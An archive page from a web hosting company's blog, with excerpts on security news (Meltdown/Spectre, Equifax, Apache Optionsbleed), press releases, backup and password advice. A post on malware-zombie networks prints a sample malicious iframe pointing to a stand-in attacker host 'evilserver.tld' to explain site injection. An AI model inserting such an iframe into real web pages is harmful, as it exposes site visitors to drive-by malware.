Category Archives: Uncategorized

Future Hosting Response to Side-Channel Speculative Execution (Meltdown & Spectre) Vulnerabilities

Summary

As you may be aware, a number of serious vulnerabilities have been disclosed that affect a wide set of CPU architectures. These vulnerabilities (CVE-2017-5715, CVE-2017-5753, CVE-2017-5754) were disclosed this week by Google’s Project Zero team and other information security professionals. A rapid response strategy is currently under review for emergency maintenance to patch these vulnerabilities, which will require a reboot of all shared, dedicated and cluster systems.

The vulnerabilities, known as side-channel speculative execution or Meltdown and Spectre, have the potential to allow code to execute on a CPU and access regions of memory that should otherwise be protected from access. This is a vulnerability that has existed for more than 20 years in modern processor architectures like Intel, AMD and ARM across servers, desktops and mobile devices.

Given the seriousness of this set of vulnerabilities, a rapid response is required to ensure our customers are protected. To be clear, there are currently no known exploits circulating that take advantage of these vulnerabilities. However, since details and code fixes are now publicly available, it is only a matter of time before attacks develop around these vulnerabilities.

Here’s Why Cybersecurity AI Won’t Be Taking Over Any Time Soon

Here's Why Cybersecurity AI Won't Be Taking Over Any Time Soon

Photo by Gerd Altmann on Pixabay

Cybersecurity used to be a lot simpler. There were clearly-defined perimeters consisting of firewalls and hardened systems. Access was strictly and effectively controlled.

Then, over the course of just a few years, nearly everything changed. Advances in networking technology made bandwidth cheaper than ever, driving the growth of the cloud. Smartphones and tablets flooded the market, allowing workers to do their job from anywhere in the world.

Traditional security perimeters have more or less completely dissolved. Corporate data is no longer just within the walls of your business. It’s on employee smartphones and desktops, being sent over public WiFi networks, and being attached to unencrypted email.

The Equifax Breach Says A Lot About Cybersecurity – None of it Good

The Equifax Breach Says A Lot About Cybersecurity - None of it Good Early last month, credit reporting agency Equifax revealed that it has suffered one of the largest security breaches in history. More than 143 million American citizens have had their information compromised, with data ranging from banking information to social security numbers falling into the hands of the attackers. Currently, it’s unclear if the attack was state-sponsored – though given the specifics, that hardly matters.

GitHub Introduces Dependency Graphs With Security Warnings

GitHub Introduces Dependency Graphs With Security Warnings

Photo by Gabriel Gurrola on Unsplash

One of the most amazing aspects of the open source world is the way developers are able to build on the work of other developers. Developers are taught that duplication of effort is misguided: don’t build something if someone has already built it. But that approach is only workable if developers have access to a large selection of libraries and tools, which is exactly what the open source community has provided.

Developers can grab libraries and frameworks that add pretty much any functionality they might need to their software. Take a look at any JavaScript code base and you’ll see that it pulls in many different libraries. Some software has hundreds of dependencies. Each project has dependencies, and those dependencies have dependencies, and so do those dependencies, and so on.

What’s Wrong With Lifestyle Businesses?

What's Wrong With Lifestyle Businesses?

Photo by Anemone123 on Pixabay

Earlier this year, Stefan Klumpp published an article praising the benefits of lifestyle businesses. The article is interesting, but what struck me was the pushback the author received from the developer and startup communities. The common implication seemed to be that starting a lifestyle business was somehow frivolous, and that we should all be founding or working for VC-funded startups that just might become the next unicorn.

If you’re not familiar with what a lifestyle business is, check out the article I linked to above. But in brief, it’s a business intended to allow its founder to improve their lifestyle and generate a reasonable income in exchange for a reasonable amount of work. Lifestyle businesses are often associated with digital nomads, people who travel as they work, but the there’s no necessary link. A lifestyle business can support many different lifestyles.

How To Communicate The Need For Software Updates To Users

How To Communicate The Need For Software Updates To Users

Photo by Jason Rosewell on Unsplash

I’m a geek and I love software updates. I read the release notes carefully, even the annoying “funny” ones. I check out the new features. I take note of any security fixes. The technically inclined people I know have a similar relationship to software. The same can’t be said for the average user, many of whom simply don’t see the need to update software. That’s bad enough when they fail to update iPhone apps, but it’s a disaster when they take the same approach to their content management system or eCommerce store.

How To Make Sure Your Support Requests Are Resolved Quickly

How To Make Sure Your Support Requests Are Resolved Quickly

Photo by Tim Gouw on Unsplash

When we choose a hosting provider we tend to focus on price and resources, but support is at least as important. The expertise and dedication of a hosting company’s support team can make a huge difference to the hosting experience. In the worst cases, poor support can cost a hosting client more money in lost business than they saved by opting for a low-grade host with lax support.

But even the best hosting support teams need help from their clients to be effective. I’ve often observed that making effective requests of hosting support technicians doesn’t come naturally to many people, and as someone who has experienced support from the other side, I’d like to give hosting clients a bit of advice about how to get their issues resolved as quickly as possible.

Comments Suck, But They Don’t Have To

Comments Suck, But They Don't Have To

Photo by 3dman_eu on Pixabay

User-generated content has been central to the web since its earliest days. Whether it’s social media, Wikipedia, blog comments, or product reviews, the bulk of the web’s content — not to mention its SEO juice — is created by ordinary users, not site owners and professional writers. For many, this conversational aspect of the web is vital to their conception of what the web is.

What Lies Beneath — Insecure Dependencies Put Web Apps At Risk

What Lies Beneath — Insecure Dependencies Put Web Apps At Risk

Photo by raedon on Pixabay

Imagine how different the web would be if developers couldn’t rely on the work of other developers. Everything would have to be coded from scratch. Without the libraries and frameworks that provide networking, encryption, I/O, graphics, and a thousand other pieces of the software puzzle, the world would be a different place. Code re-use is vital to modern software development, but it comes at a price.

A recent study TK provides a concrete example of something that is already common knowledge among developers and security researchers: insecure code in dependencies creates vulnerabilities in many web applications.

Why Should Net Neutrality Matter To Ordinary Consumers?

Why Should Net Neutrality Matter To Ordinary Consumers?

Photo by Evan Dennis on Unsplash

It’s easy to make the case for net neutrality to Future Hosting’s web and server hosting clients. They have the most to lose if practices like zero rating and bandwidth fast-lanes become the norm. They’re the ones who will be asked to pay the last-mile ISPs for privileged access to users. And they’re the ones who will be put at a competitive disadvantage compared to established web giants.

But it’s not so easy to make the case to ordinary consumers. In fact, from the perspective of the average consumer, their experience of the web might actually improve. They may be able to stream music from their favorite streaming service without it impacting their bandwidth caps. They may be able to watch premium video content at higher qualities with less buffering. So why should the average web user care about net neutrality?

Apache Vulnerability Leaks Sensitive Data — Update Advised

Apache Vulnerability Leaks Sensitive Data — Update Advised

Photo by Henry Hustava on Unsplash

A vulnerability that leaks sensitive information has been discovered in the Apache web server. The vulnerability, named Optionsbleed, is caused by a use-after-free bug that can be exploited by sending repeated OPTIONS requests to an instance of Apache. Optionsbleed is especially dangerous for shared hosting providers, so if you use a virtual private server or dedicated server for shared hosting, update as soon as possible.

Do You Really Want To Leave Apache Struts Unpatched?

Do You Really Want To Leave Apache Struts Unpatched?

Photo by Jon Tyson on Unsplash

Unless you’ve been holidaying on the moon, you’ll be aware of the unfortunate incident of Equifax and the security breach which caused a monumental leak of sensitive data impacting well over a hundred million Americans and countless others from around the world. The attackers accessed the data through a vulnerability in Apache Struts, a web framework used to develop Java EE web applications.

If you use Apache Struts, make sure that it has been updated to the most recent version.

September 2017’s Best Open Source, Cybersecurity, and Web Development Content

September 2017’s Best Open Source, Cybersecurity, and Web Development Content

Photo by moritz320 on Pixabay

Summer is over, but let’s not get stuck on that. Fall is here and so is our first roundup of the season. Taking a quick sneak peek at the last thirty days of news, highlights include SUSE’s 25th birthday, Bill Gates’ biggest regret, and a team of RV driving retirees that fill Amazon’s seasonal workforce. Lowlights includes the Equifax hack. Without further ado, jump into the roundup and enjoy the rest of September’s best content. If you enjoy this collection of the web’s top articles, feel free to follow us over on Facebook, Twitter, and Google+ for the same great content the rest of the year.

Side Projects: Kick Your Design Or Development Career Up A Notch

Side Projects: Kick Your Design Or Development Career Up A Notch

Photo by Jason Briscoe on Unsplash

Those blessed with the creative urge usually have a store of ideas they would like to work on if only they had the time. Side projects — personal projects worked on when you’re off the clock — give you the opportunity to flex your creative muscles while developing skills that will help you in your career.

The meme that advises us to do what we love and pursue careers we’re passionate about contains a kernel of truth. It would be wonderful if we could get up every morning excited about the day’s work because we intend to spend the next few hours doing what we love. But however much we love to design or code or write, the bottom line looms large over our days. We work to earn money and to make our employers and clients happy. We can’t always do what we’re passionate about.

Headless CMS: Why Decouple The Front And Backend Of Your Site?

Headless CMS: Why Decouple The Front And Backend Of Your Site?

Photo by Alexas_Fotos on Pixabay

We’ve discussed static site generators often on the Future Hosting blog. Like many developers and site owners, I enjoy the flexibility and freedom static site generators offer, not to mention the performance benefits of static sites. But static site generators pose a problem for developers who build sites for ordinary users. SSGs expect a familiarity with web technologies that web developers can’t assume of their users.

Headless content management systems are a nice compromise: they allow developers to build front-ends that are decoupled from the underlying content management system’s theme framework. That means front-ends can be built in Angular, React, or any other JavaScript framework by developers who aren’t keen on tangling with the intricacies of PHP-based themes.

Are Progressive Web Applications The Future Of eCommerce

Are Progressive Web Applications The Future Of eCommerce

Photo by Mikaela Shannon on Unsplash

Online retail is primarily web-based, and for most smaller eCommerce merchants, that’s as far as it goes. Native applications have advantages, but they’re expensive to build and maintain. Maintaining two — or more — code-bases is beyond the resources of many eCommerce stores — and the advantages are often not that impressive where sales are concerned. So, the great majority of eCommerce merchants simply don’t bother with a native application.

Nevertheless, there are distinct advantages to native mobile applications. They have a permanent space on the user’s device — a constant reminder of the brand and its products. Perhaps even more importantly, native applications are at least minimally useful when the device doesn’t have a network connection. And native applications have easier access to on-device functionality like push notifications.

How To Avoid Publishing Fake News On Your Website

How To Avoid Publishing Fake News On Your Website

Photo by Kayla Velasquez on Unsplash

Fake news is big news, and companies like Facebook and Google are investigating technologies that can separate fake from fact on their platforms.

Before I say anything on this subject, it’s worth emphasizing that it’s a contentious issue: people don’t agree on what counts as fake news, whether it’s the responsibility of content platforms to filter fake news, and whether it’s even possible. Nevertheless, media organizations and content platforms are working hard to remove obviously fake information, and that’s likely to have an impact on web publishers.

Vigilance 101: The Sysadmin’s Threat Detection Checklist

Vigilance 101: The Sysadmin's Threat Detection Checklist

Photo by Alexas_Fotos on Pixabay

I’d like to kick off this piece with a simple question. Are a locked door and a closed window enough to deter a thief? You already know the answer to that one, I’ll wager – the criminal will just wait until no one’s around and break the window or kick down the door.

Why, then, are there so many of us who persist in thinking that hardened software and data are enough to deter cybercriminals?

Mind you, I’m not trying to downplay the importance of proper security. Quite the contrary, really – you need stuff like mobile device management, file encryption, firewalls, and access controls. But you also need to do more than that, too.

Could Quantum Computers Be The Biggest Security Threat In History?

Could Quantum Computers Be The Biggest Security Threat In History?

Photo by insspirito on Pixabay

A few months back, we wrote a piece on the power of quantum cryptography, and what it might mean for web hosting. Today, I’d like to revisit that topic from a slightly different angle. We all know that quantum encryption could result in the creation of nigh-uncrackable systems…but what happens if a criminal gets their hands on a quantum computer and decides they want to use it to launch an attack?

See, the thing about quantum computing is that it is very much in its nascent stages. Quantum computers are unstable – even a small state change can completely destroy them. What that means is that when we do start bringing them to market, it’s going to be a gradual rollout.

Is Your Hosting Provider Putting Security In Jeopardy With Old Versions Of PHP?

Is Your Hosting Provider Putting Security In Jeopardy With Old Versions Of PHP?

Photo by Jared Erondu on Unsplash

PHP is one of the most important languages on the web. Rivaling JavaScript for ubiquity in web development, PHP powers many of the web’s leading eCommerce applications and content management systems, including that colossus of the CMS world, WordPress.

Software developed over many years — 21 in the case of PHP — is bound to have lots of versions that remain in use long after their developer withdraws support. Occasionally, sticking with old versions of software is unavoidable.

Advertising Isn’t The Only Way Publishers Can Make Money On The Web

Advertising Isn’t The Only Way Publishers Can Make Money On The Web

Photo by Fabian Blank on Unsplash

Earlier this year, Smashing Magazine, announced a major re-imagining of their website. In addition to changing the technology stack and design, Smashing Magazine’s publishers are making a decision that caught the attention of many in the web publishing world: they’re cutting back on advertising in a big way.

Advertising has been the lifeblood of the online publishing industry for as long as there has been an online publishing industry. Although big publishers like Wall Street Journal have opted for paywalls, advertising remains the most important revenue stream for smaller publishers.

So why is advertising getting the boot? Because everyone uses ad-blockers. Over the last couple of years, ad-blockers have moved from the preserve of geeks to a mainstream phenomenon.

Four Reasons You Should Choose A Dedicated Server

Photo by Andrew Childress on Unsplash Startups have no end of infrastructure hosting options to choose from. From modest shared hosting to bare metal clouds via dedicated servers, virtual private servers, cloud servers, PaaS platforms, and many more. Each has strengths and weaknesses, but — as is often the case with complex decisions — there’s a tendency to choose based on which is getting the most marketing buzz right now. But marketing buzz doesn’t always translate into real-world capabilities and benefits.

Four Things Web Designers Need To Know About HTTP/2

HTTP/2As websites grew more complex, they became slower. We wanted beautiful interactive websites and analytics data, so we loaded sites up with images, JavaScript, and lots of CSS. Every new asset inflated the amount of data to be transmitted between the browser and the server over HTTP, but HTTP was designed when websites were simpler. It was never intended to cope efficiently with so much data and so many requests.

As pages grew, so did the awareness that performance is of vital importance. Designers and developers created techniques for performance optimisation to overcome the limitations of HTTP while allowing them to include the functionality they wanted.

Future Hosting Introduces Virtual Private Server Management in FHMP

NOVI, Mich. (August 30, 2010) – Future Hosting, an Internet solutions provider serving SMBs and enterprises internationally and developer of Future Engineer™, today introduced Virtual Private Server (VPS) management capability to its Future Hosting Management Portal (FHMP), which previously focused only on dedicated servers.

By adding VPS management capability, clients will have complete control of all of their Virtual Private Servers under a single username. VPS clients will also be able to access the complete lineup of Future Hosting client support and billing services through the same interface.

“By adding the ability for our VPS clients to manage and control their servers in this environment, our FHMP is finally becoming the ‘one stop shop’ we envisioned when we designed this solution. Our clients will be able to manage their entire array of products and services from Future Hosting in a fast, easy to use interface,” said Future Hosting Chief Technology Officer Nick Zyren.

Virtual Private Servers from Future Hosting are available in a wide variety of configurations, including on both managed and unmanaged plans. Clients are also able to locate their server in any of Future Hosting’s six international data centers, in Chicago, Dallas, Los Angeles, London, Seattle, or Washington, D.C.

Future Hosting is the developer of Future Engineer™, a technical support automation system designed to automate time consuming server configuration and repair tasks on Virtual Private Servers (VPS), Future Engineer™ allows clients to receive a greater level of technical support than is available when technicians spend their time performing routine or basic maintenance tasks. With Future Engineer™, technicians are free to spend their time offering a level of technical support that is unrivaled and otherwise unaffordable.

For more information about Future Hosting, please visit http://www.futurehosting.com.

About Future Hosting, LLC
Founded in 2001, Future Hosting is a privately held leading Internet solutions provider specializing in managed hosting, including Dedicated Servers, Virtual Private Servers, and Hybrid Virtual Private Servers. The company has built a strong reputation for its high-quality service, innovative pricing models, and 3-hour Service Level Agreement. Future Hosting is based in Novi, Mich.

Future Hosting Adds Virtual Private Servers in Los Angeles

NOVI, Mich. (August 25, 2010) – Future Hosting, an Internet solutions provider serving SMBs and enterprises internationally and developer of Future Engineer™, today launched Virtual Private Servers in Los Angeles, the company’s sixth international data center location and latest milestone in its global expansion plan.

The new location, which has been in development for the past several months, is significant as Future Hosting aims to serve more customers in Asia and on the West Coast of the United States. Customers are now able to purchase Future Hosting’s entire line of Virtual Private Servers in the Los Angeles facility. Additional services will be added in the coming months.

“For several years, we have made clear our commitment to globalizing our line of services. In the era of high-availability hosting and cloud infrastructure deployments, our customers need to be able to leverage our truly global reach to remain competitive. Our global, geographically diversified footprint will continue to grow,” said Vik Patel, Future Hosting president & CEO.

Virtual Private Servers from Future Hosting are available in a wide variety of configurations, including on both managed and unmanaged plans. Clients are also able to locate their server in any of Future Hosting’s six international data centers, in Chicago, Dallas, London, Seattle, Washington, D.C., and now Los Angeles.

Future Hosting is the developer of Future Engineer™, a technical support automation system designed to automate time consuming server configuration and repair tasks on Virtual Private Servers (VPS), Future Engineer™ allows clients to receive a greater level of technical support than is available when technicians spend their time performing routine or basic maintenance tasks. With Future Engineer™, technicians are free to spend their time offering a level of technical support that is unrivaled and otherwise unaffordable.
For more information about Future Hosting, please visit http://www.futurehosting.com.

About Future Hosting, LLC
Founded in 2001, Future Hosting is a privately held leading Internet solutions provider specializing in managed hosting, including Dedicated Servers, Virtual Private Servers, and Hybrid Virtual Private Servers. The company has built a strong reputation for its high-quality service, innovative pricing models, and 3-hour Service Level Agreement. Future Hosting is based in Novi, Mich.

Future Hosting Grows Global Footprint with Hybrid Servers in Chicago, Washington, D.C.

Future Hosting Grows Global Footprint with Hybrid Servers in Chicago, Washington, D.C.

NOVI, Mich. (July 26, 2010) – Future Hosting, an Internet solutions provider serving SMBs and enterprises internationally and developer of Future Engineer™, today introduced Hybrid Servers in Chicago and Washington, D.C., further expanding the company’s global footprint. Hybrid Servers are also available in London and Dallas, allowing clients to now choose from four international cities.

Hybrid Servers from Future Hosting are unique, high-end Virtual Private Servers that deliver full management, high-availability, premium bandwidth, and access to either the cPanel or Plesk hosting control panel. Unlike standard Virtual Private Servers, Hybrid Servers offer an average of 1 CPU core per Hybrid Server and high-performance RAM, disk storage, and network connectivity.

“Offering truly global solutions for our clients remains a strategic goal for Future Hosting. In the past two years alone, we have more than quadrupled our international presence, and created the ability to offer full-service hosting solutions for companies based in the United States and abroad. By adding Hybrid Servers to two new major American cities, we are fulfilling our commitment to continuously build geographic diversity in our services and open the door to even further expansion in the months ahead. This is one more step in our march to globalization,” said Future Hosting Chief Strategy Officer Stephen Kowalski.

Hybrid Servers from Future Hosting are automatically backed up by the company’s next-generation Future Protect™ data protection service, which delivers the ultimate in protection against data loss. Starting Hybrid Server plans offer 80GB of disk space, 2GB of RAM, and 2000GB of premium bandwidth. All Hybrid Servers include SLA uptime of at least 99.9%.

In early July, Future Hosting added complete DNS management functionality to the Future Hosting Management Portal (FHMP), which provides dedicated server clients with complete control of their servers. FHMP is slated to eventually incorporate Hybrid servers, further enhancing user control.

Future Hosting is the developer of Future Engineer™, a technical support automation system designed to automate time consuming server configuration and repair tasks on Virtual Private Servers (VPS), Future Engineer™ allows clients to receive a greater level of technical support than is available when technicians spend their time performing routine or basic maintenance tasks. With Future Engineer™, technicians are free to spend their time offering a level of technical support that is unrivaled and otherwise unaffordable.

For more information about Future Hosting, please visit http://www.futurehosting.com.

For more information about Hybrid Servers from Future Hosting, please visit http://www.futurehosting.com/managed-hybrid-servers.

About Future Hosting, LLC

Founded in 2001, Future Hosting is a privately held leading Internet solutions provider specializing in managed hosting, including Dedicated Servers, Virtual Private Servers, and Hybrid Virtual Private Servers. The company has built a strong reputation for its high-quality service, innovative pricing models, and value-added features. Future Hosting is based in Novi, Mich.

Future Hosting VPS Upgrades – Letter from CEO

The following letter was sent to existing VPS clients today:

I hope this letter finds you well. I’m writing today to provide information about several exciting upgrades that will affect your Virtual Private Server. As always, if you have any questions about this email or Future Hosting services in general, please do not hesitate to contact our customer support team.

1. Future Hosting Management Portal (FHMP)

If you have followed Future Hosting on Facebook or Twitter, you may have heard about our new Future Hosting Management Portal (FHMP). Developed for Future Hosting for more than a year, FHMP is a custom-built account management interface that delivers unprecedented control and ease of use for our clients. Its entire design was literally focused on feedback we have received from our clients in recent years.

Notably, FHMP includes the ability to use a single unified login to access billing, customer support, and server management functionality—there’s no need to keep track of separate URLs and usernames for each anymore. FHMP also offers a real-time management dashboard, which displays recent tickets, billing information, bandwidth usage, and other vital metrics about your Virtual Private Server. Additionally, FHMP finally delivers an easy-to-understand invoice system (our current system annoyingly sends multiple e-mails for each invoice which are not necessary).

Converting to FHMP is a complicated process, and we are moving clients over in small groups. We expect to begin the process on August 1, 2010. When your account is moved to FHMP, we will notify you via email with a new support ticket. Your patience during this period is greatly appreciated. Please let us know if you encounter any issues relating to the FHMP upgrade.

2. Hardware Upgrades and Free Added Disk Space

Several months ago, we began seeking even greater client feedback an in effort to find new ways to improve our services. We received a tremendous amount of responses, and our clients largely asked for two improvements: upgrade the management portal and increase disk space allotments. I’ve already outlined our action on the management portal above.

Today I’m happy to announce that we will increase disk space allotments by 50% for all Virtual Private Servers that have been at the Gold level or higher for at least the past three months. We will do so without raising any client costs or reducing any other features, and we will continue to utilize 15,000 RPM SAS hard drives in RAID configuration to assure optimal performance. Quality, as always, remains our goal.

All disk space upgrades will be applied during our upgrade to FHMP, and eligible clients will be notified when this upgrade has been applied. Please note that if the Virtual Private Server is downgraded at any time, the additional disk space will be forfeited from the account. Please let us know if you encounter any issues relating to the disk space upgrade.

3. Thank you for your support!

I want to take this opportunity to personally thank you for your continued support of Future Hosting. For nearly a decade, our entire team has worked to deliver the world’s best hosting services, and our entire business is built on this reputation.

I invite you to constantly provide us with feedback—let us know what’s working well and what isn’t. Positive or negative, your feedback matters to us, and it will never go unread. Beyond reaching out to our client support team, I also personally invite your ideas, thoughts, comments and concerns via email at email hidden; JavaScript is required. Though I may not be able to respond to every email, I take time to read each message I receive, and this vital information will undoubtedly shape the future of our services.

Onward together,

Vik Patel
President & CEO
Future Hosting

Future Hosting Adds Full DNS Control to Management Portal

NOVI, Mich. (July 13, 2010) –Future Hosting, an Internet solutions provider serving SMBs and enterprises internationally and developer of Future Engineer™, today added complete DNS management functionality to its Future Hosting Management Portal (FHMP), which provides dedicated server clients with complete control of their servers.

DNS management functionality enables dedicated server clients to manage forward and reverse DNS. Clients can also take advantage of Future Hosting’s geographically-redundant nameservers, which are spread across five international datacenters. The geographic diversity helps maximize uptime and reduce latency.

Future Hosting also added a variety of integrated network tools to its FHMP, including Ping, Traceroute, WHOIS lookups, and other basic tools.

“After launching our FHMP earlier this year, we’ve received a tremendous response from our loyal dedicated server clients. Today’s announcement represents the first of many iterations that will enhance the user experience and make our portal even more powerful,” said Future Hosting Chief Technical Officer Nick Zyren.

Dedicated Servers from Future Hosting are available in a wide variety of configurations, including on both managed and unmanaged plans. Clients are also able to locate their server in any of Future Hosting’s five international data centers, in Chicago, Dallas, London, Seattle, or Washington, D.C.

Future Hosting is the developer of Future Engineer™, a technical support automation system designed to automate time consuming server configuration and repair tasks on Virtual Private Servers (VPS), Future Engineer™ allows clients to receive a greater level of technical support than is available when technicians spend their time performing routine or basic maintenance tasks. With Future Engineer™, technicians are free to spend their time offering a level of technical support that is unrivaled and otherwise unaffordable.

For more information about Future Hosting, please visit http://www.futurehosting.com.

The Anatomy of a malware-zombie network and how it affects your website & everyone! (Part I)

Remember the “This site may harm your computer” warning message that you
came across on Google when you were searching for something which looked
like this…

…or the warning shown on FireFox/Chrome which looked like this:

…or your anti-virus software alerting you that a threat has been detected
when accessing a certain website?

If it happens to be your website then your website is the victim of a
malware attack where malicious codes are injected in your web pages.
According to a 2009 Websense report (link),
77% of Web sites with malicious code are legitimate websites that have been
compromised. It also recorded a “671% growth in the number of malicious
websites detected in 2008 – 2009”.

Who makes malware and why do they?

Malware is created by hackers or groups of hackers who intentionally do it

for their own interests. These viruses/malwares can be designed to illegally

use a PCs resources without the knowledge of the user to steal data

including bank accounts, credit cards, passwords, etc.; launch distributed
network attacks (like DDoS) on other servers; obtrusively advertise products
or services in the form of pop-up ads; send spam; etc. Your PC becomes a
“zombie” and spreads the infection into other PCs and becomes part of the
cycle called a “zombie network”. This allows the master of the “zombie
network” to access resources of all infected computers and use them to their
own benefits. There are even “Software as a Service” (SaaS) type websites
that offer automated solutions for anyone who want to inject several
websites with iframe codes which is indeed shocking.

How will my website be affected when my PC is infected?


95% of the malware attacks occur via FTP where a malicious code (an iframe
usually) is injected into the website files. The hackers/attackers may even
upload malicious files for other evil activities. So once the virus in your
PC steals the FTP login details from your PC anything can happen with
disastrous results.

The virus in your PC can retrieve your FTP login details without your
knowledge and that is normally done using a couple of methods:

1) When you save your FTP login in your FTP client software (e.g. Filezilla,
CuteFTP, etc.), the virus in your PC can decrypt the logins stored in the
FTP client software data file and it sends the login details to a master
(evil) server which is then distributed to others (hackers) for uploading
the malicious codes on their request.

2) The virus in your PC could be key-logging or sniffing your FTP (or even a
control panel) traffic and would steal those information to the master
server, all without your knowledge.

What does the malicious code contain?

The malware is designed to do specific functions when the unsuspecting
visitor to your legitimate website access it on their browser. The most
popular malicious codes are iframe codes so that the code would execute
along with your web page in the background. The iframe code would probably
execute a link to the malicious file which is hosted on another remote
server and is downloaded through the unsuspecting visitor’s browser to their
PC and the cycle continues as that PC has become part of the zombie network
now.

Typical iframe code: < iframe src=evilserver.tld/getexploits.php border=0 >

In the above example, when getexploits.php is triggered through the browser
it may use vulnerabilities in the browser to exploit it.

What else can happen to the website when my FTP login is compromised?

Since the hackers are now able to upload files to your account through FTP,
other than injecting malicious codes to files they may even upload spamming
scripts to send spam emails from your server, they may upload DoS scripts to
launch distributed attacks on other servers, run IRC bots which can result
in extremely high bandwidth usage, etc. As a result of the malicious
activity your website will start losing traffic as search engines and
browsers will block your website and result in lower search engine ranking
and gets blacklisted as well. It just doesn’t matter how big or small your
website is and how malicious the hack is – this is the sort of relationship where malware (hackers) always win and legitimate websites always lose.
How can I safe guard my PC to prevent FTP login theft?

This will be extensively discussed in the next part of this security special
blog series, please stay tuned!


Arun
System Administrator
Future Hosting, LLC

3-2-1 Go

Whether it is the personal computer or it is the dedicated server, it is important to have a strategy that will be successful for you personally or your organization. One strategy that I have found personally that is successful and that can be used in a larger scale to fit a large organization or to backup the family pictures is the 3-2-1 method.

Basically this means:

3 Different backups – Have three backups – one being the primary backup and two being secondary backups

2 Types of Media – I use a hard drive and a online backup

1 Offsite location – My offsite location is a safety security box at a branch of my bank 30 miles away.

There are some concessions you can make to this plan to fit yourself. For example, instead of using a hard drive, you could use a USB thumb drive depending on how much storage you need to be backed up. Another different way you could go is you can move your offsite location to be something less expensive, like at a relative’s house (at least 25 miles away from the primary backup location). To make this work for a large organization, you could multiply the 3-2-1 strategy by a factor of 2 or 3. Meaning that if you used the 2-factor version of 3-2-1, you would have 6 backups, 4 types of media (your IT department will love this, because they can dust off the old 3M QIC drives), and 2 offsite locations (in diverse geographical locations in case of catastrophe). As you can see it is easy to have a successful backup plan, but you must remain dedicated to your plan.

Go to the Doctor

You have to consider changing your passwords like doing a task that has to be done like going to the doctor for a check-up. Every now and again you have to change your password to maintain the health of your accounts online. Despite the crucial need to constantly change your passwords, the majority of people online do not change their passwords at all. Not only do some people not change their passwords, they choose incredibly weak passwords. Earlier this year, a popular site was breached and their users’ passwords were posted online. In an analysis of these passwords some of the most common passwords used were ‘123456’, ‘Password’, and ‘iloveyou’. Keep in mind as the good guys (us) keeping on getting smarter about security, the bad guys are getting equally as smart.

On our end we do our best to secure your account at Future Hosting, but you could give us some assistance to habitually change your passwords. Here internally at Future Hosting we change our passwords frequently, and we suggest you do the same.

Here are some guidelines to have a strong password:

•Use a random password generator (I recommend the one at The BitMill Inc.  – http://www.thebitmill.com/tools/password.html)
•Use as many characters as possible and mix them between numbers and letters (and possibly special characters if allowed)
•Make sure to use non-dictionary words, because those are the easiest to brute force attack (you can check to make sure at dictionary.com)

NEVER do these:

•Share your password with co-workers, friends, or family
•Write down your password on a note and attach it to your monitor
•Use a common password (http://www.pcmag.com/article2/0,2817,2113976,00.asp)

Now go change your password!!!

Future Hosting Expands Exclusive Future Hosting Partner Program, Offers Cash Bonus

NOVI, Mich. (April 12, 2010) – Future Hosting, an Internet solutions provider serving SMBs and enterprises internationally and developer of Future Engineer™, today expanded its popular internal affiliate program, the Future Hosting Partner Program, to allow non-clients to participate and receive cash payouts. The program will also reward the top-affiliate with a $500 cash bonus.

Future Hosting Goes ‘Rebootless’ with Ksplice Uptrack Technology

The following service has been removed by Future Hosting.

NOVI, Mich. (January 15, 2010) – Future Hosting, an Internet solutions provider serving SMBs and enterprises internationally and developer of Future Engineer™, today announced it has adopted Ksplice Uptrack™, a new technology enabling upgrades and maintenance on Linux servers without the need to reboot the system.


Traditionally, server administrators are required to reboot the system after performing upgrades to the Linux kernel. Although reboots only take several minutes, they inevitably cause downtime and disrupt the normal operation of the system. Ksplice’s rebootless technology instead converts important kernel upgrades to rebootless packages that can be installed without the need to reboot the system.


“Ksplice Uptrack is an important technology that will enable our technical staff to reduce the amount of time we spend on routine maintenance and in return provide even greater uptime for our clients. The ability to eliminate the majority of reboots is something we are excited to add to our arsenal. We’re reducing both costs and headaches at the same time,” said Future Hosting Chief Technology Officer Nick Zyren.


“Ksplice Uptrack brings systems to a whole new level of availability and security, and we’re delighted to be working with Future Hosting to serve their customers better,” said Ksplice Chief Operating Officer, Waseem Daher.


Ksplice Uptrack works in both traditional and virtualized Linux environments. Future Hosting will immediately begin using the technology on Virtual Private Server nodes in all of its data centers.


Virtual Private Servers from Future Hosting start at just $24.95 per month, and are available in a wide variety of configurations, including on both managed and unmanaged plans. Customers are also able to locate their server in any of Future Hosting’s five international data centers, in Chicago, Dallas, London, Seattle, or Washington, D.C.


Future Hosting is the developer of Future Engineer™, a technical support automation system designed to automate time consuming server configuration and repair tasks on Virtual Private Servers (VPS), Future Engineer™ allows clients to receive a greater level of technical support than is available when technicians spend their time performing routine or basic maintenance tasks. With Future Engineer™, technicians are free to spend their time offering a level of technical support that is unrivaled and otherwise unaffordable.


For more information about Future Hosting, please visit http://www.futurehosting.com.


About Future Hosting, LLC

Founded in 2001, Future Hosting is a privately held leading Internet solutions provider specializing in managed hosting, including Dedicated Servers, Virtual Private Servers, and Hybrid Virtual Private Servers. The company has built a strong reputation for its high-quality service, innovative pricing models, and 3-hour Service Level Agreement. Future Hosting is based in Novi, Mich.

Future Hosting Offers Hybrid Virtual Private Servers in London

NOVI, Mich. (December 7, 2009) – Future Hosting, an Internet solutions provider serving SMBs and enterprises internationally and developer of Future Engineer™, today announced the launch of Hybrid Virtual Private Servers (VPS) in its London data center facility, continuing its globalized approach to virtualization. The company already offers traditional Virtual Private Servers in five international cities.

Hybrid Virtual Private Servers provide significantly greater power than traditional Virtual Private Servers. With a Hybrid VPS, physical servers average one CPU core per VPS, and each node has a maximum capacity of 8 VPS instances (thereby assuring at least one CPU core per VPS). This strict capacity limit also increases disk I/O availability, and provides greater overall performance.

Physical hardware is also more robust in the Hybrid VPS environment, usually providing greater RAM, upgraded network interface cards (NICs), and other features. Hybrid Virtual Private Servers are available as either managed or unmanaged.

“For years, we have specialized in providing the industry’s most reliable, affordable, and scalable Virtual Private Server and Dedicated Server hosting solutions. With an international colocation portfolio and long track record of performance, we continue to realize low customer turnover and significant new customer growth in both of these service areas. However, as new technologies continue to underscore the value of virtualization, we see real strategic value in introducing Hybrid VPS to meet the needs of an emerging market segment,” said Future Hosting Chief Strategy Officer Stephen Kowalski.

Hybrid Virtual Private Servers start at $99.95 per month for 2000GB of monthly data transfer, 2GB of RAM, 50GB of disk space, and 4 IP addresses. Customers can choose from cPanel or Plesk at no additional charge.
